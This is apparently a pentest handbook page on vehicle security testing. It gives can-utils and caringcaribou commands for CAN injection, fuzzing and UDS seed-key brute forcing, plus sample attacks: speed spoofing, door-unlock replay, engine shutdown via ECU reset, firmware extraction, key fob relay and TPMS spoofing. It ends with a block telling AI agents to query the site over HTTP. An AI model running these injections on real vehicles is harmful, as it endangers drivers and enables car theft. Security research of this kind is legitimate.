# Automotive Security Security testing for vehicle systems - CAN bus, LIN, OBD-II, and connected car security. > **Skill Level**: Advanced\ > **Prerequisites**: Embedded systems, networking, automotive protocols ## Overview ``` Vehicle attack surfaces: - CAN bus (internal communication) - OBD-II port (diagnostic access) - Infotainment systems (Android/Linux) - Telematics (cellular, GPS) - Bluetooth/WiFi - Key fobs (RF) - TPMS (tire pressure sensors) ``` ## CAN Bus (Controller Area Network) ### Basics ``` - Broadcast protocol (all nodes see all messages) - No authentication (by design) - 11-bit or 29-bit identifiers - Up to 8 bytes data per frame - Speeds: 125 kbps to 1 Mbps ``` ### Hardware ``` Required: - CAN interface: CANtact, PCAN-USB, Kvaser - OBD-II to DB9 cable - Linux laptop with can-utils Budget options: - Arduino + MCP2515 CAN shield (~$15) - ELM327 (limited, read-only OBD) ``` ### Setup ```bash # Load CAN kernel modules sudo modprobe can sudo modprobe can_raw sudo modprobe can_bcm sudo modprobe vcan # Virtual CAN for testing # Create virtual CAN interface (testing) sudo ip link add dev vcan0 type vcan sudo ip link set up vcan0 # Setup real interface (CANtact/similar) sudo slcand -o -c -s6 /dev/ttyACM0 can0 sudo ip link set up can0 # Or with specific bitrate sudo ip link set can0 type can bitrate 500000 sudo ip link set up can0 ``` ### Sniffing ```bash # can-utils - candump candump can0 candump can0 -L # Log format candump can0 -c # Color output # Expected output: # can0 7DF [8] 02 01 00 00 00 00 00 00 # can0 7E8 [8] 06 41 00 BE 3F A8 11 00 # Filter specific IDs candump can0,7DF:7FF # Only 7DF-7FF range # Save to file candump -l can0 # Creates candump-YYYY-MM-DD_HHMMSS.log ``` ### Analysis ```bash # cansniffer - Show changing bytes cansniffer can0 # Highlight changes in real-time # Press '-' to filter out static messages # canplayer - Replay captured traffic canplayer -I candump-log.log can0 # cangen - Generate random CAN traffic (testing) cangen can0 -g 100 -I 123 ``` ### Injection ```bash # Send single frame cansend can0 7DF#0201000000000000 # Send frame with specific data cansend can0 123#DEADBEEF # Replay attack canplayer -I capture.log can0 # Continuous injection while true; do cansend can0 123#0102030405060708; sleep 0.01; done ``` ### Fuzzing ```bash # can-utils cangen (random) cangen can0 -g 10 -I i # Random IDs, 10ms gap # caringcaribou (automotive fuzzer) # https://github.com/CaringCaribou/caringcaribou caringcaribou -i can0 uds discovery caringcaribou -i can0 uds services 0x7e0 # Custom fuzzer for id in $(seq 0 2047); do cansend can0 $(printf '%03X' $id)#0102030405060708 sleep 0.01 done ``` ## OBD-II (On-Board Diagnostics) ### Basics ``` - Mandatory on all US vehicles since 1996 - Standardized connector location (driver's side) - Protocols: CAN, ISO 9141-2, KWP2000, SAE J1850 Standard PIDs (Parameter IDs): - 01 00: Supported PIDs - 01 0C: Engine RPM - 01 0D: Vehicle speed - 01 2F: Fuel tank level ``` ### Tools ```bash # ELM327 adapter (budget, read-only) # Connect via Bluetooth/USB/WiFi # python-OBD pip install obd python3 << 'EOF' import obd connection = obd.OBD() # Auto-connect print(connection.query(obd.commands.RPM)) print(connection.query(obd.commands.SPEED)) EOF # Output: # 1500 RPM # 60 kph ``` ### UDS (Unified Diagnostic Services) ```bash # UDS is ISO 14229 - standard diagnostic protocol # Common services: # 0x10: Diagnostic Session Control # 0x11: ECU Reset # 0x22: Read Data By Identifier # 0x27: Security Access # 0x2E: Write Data By Identifier # 0x31: Routine Control # 0x34/35/36/37: Upload/Download # Using caringcaribou caringcaribou -i can0 uds discovery caringcaribou -i can0 uds services 0x7e0 caringcaribou -i can0 uds subservices 0x7e0 0x27 # Security access # Brute force security access (seed-key) caringcaribou -i can0 uds security_seed 0x7e0 1 ``` ## Attack Scenarios ### Speed Spoofing ```bash # Find speed CAN ID (usually instrument cluster) # Use cansniffer while driving at constant speed # Inject false speed cansend can0 ABC#00FF00000000 # Specific to vehicle # Can affect: # - Speedometer display # - ADAS systems # - Transmission behavior ``` ### Door Unlock ```bash # Monitor CAN bus while using key fob candump can0 > baseline.log # Press unlock on key fob candump can0 > unlock.log # Compare to find unlock message diff baseline.log unlock.log # Replay unlock command cansend can0 [ID]#[DATA] ``` ### Engine Shutdown ```bash # Find ECU diagnostic IDs (usually 7E0-7EF range) # Send diagnostic session + ECU reset # Enter diagnostic session cansend can0 7E0#0210010000000000 # Send ECU reset (soft reset) cansend can0 7E0#0211010000000000 ``` ### Firmware Extraction ```bash # UDS firmware download # Requires bypassing security access first # 1. Enter extended diagnostic session cansend can0 7E0#0210030000000000 # 2. Security access (need seed-key algorithm) cansend can0 7E0#0227010000000000 # Request seed # Calculate key from seed cansend can0 7E0#022702[KEY] # Send key # 3. Request upload cansend can0 7E0#103400[address][size] # 4. Transfer data cansend can0 7E0#3601... # Read chunks ``` ## Key Fob Attacks ### Relay Attack ``` Equipment: - 2x SDR devices (HackRF, RTL-SDR) - Amplifiers - Yagi antennas Attack: 1. Device A near car, Device B near owner 2. Relay RF signals between devices 3. Car thinks key is nearby 4. Unlock/start vehicle ``` ### Rolling Code Analysis ```bash # Capture with RTL-SDR + GNU Radio # Most modern vehicles use rolling codes (KeeLoq, etc.) # Universal Radio Hacker (URH) # https://github.com/jopohl/urh urh # GUI for signal analysis # Analyze captured signals # Look for patterns, synchronization ``` ### TPMS (Tire Pressure) ```bash # Usually 315 MHz (US) or 433 MHz (EU) # Often unencrypted # Capture with RTL-SDR rtl_433 -f 315M # Can potentially: # - Track vehicles by TPMS ID # - Spoof low pressure warnings # - Cause driver distraction ``` ## Infotainment Systems ### Attack Surface ``` - USB ports (often run as root) - Bluetooth (pairing, profile attacks) - WiFi (if equipped) - Cellular (telematics) - Navigation data (SD cards) - App stores (Tesla, Android Auto) ``` ### Testing ```bash # USB: Check for update mechanisms # Many accept USB drives for firmware updates # Bluetooth: Standard BLE/BR/EDR attacks # See wireless.md and iot-protocols.md # Root access: Many run Linux/Android adb connect [IP] # If ADB exposed ``` ## Tools ```bash # can-utils sudo apt install can-utils # Caring Caribou https://github.com/CaringCaribou/caringcaribou pip install caringcaribou # ICSim (Instrument Cluster Simulator) https://github.com/zombieCraig/ICSim # Practice without real vehicle # Kayak https://github.com/dschanoeh/Kayak # Java-based CAN analysis # SavvyCAN https://github.com/collin80/SavvyCAN # GUI for CAN analysis # Vehicle Spy (commercial) # CANalyzer (commercial) ``` ## Legal Considerations ``` ⚠️ IMPORTANT: - Only test on vehicles you own or have written permission - Never test on public roads while driving - Some attacks may void warranties - May violate CFAA (US) or similar laws - Automotive OEMs may pursue legal action ``` ## Related Topics * [Hardware Hacking](/others/hardware.md) - Physical security testing * [Wireless Testing](/others/wireless.md) - RF attacks * [IoT Protocols](/others/iot-protocols.md) - Related protocols --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.pentest-book.com/others/automotive-security.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.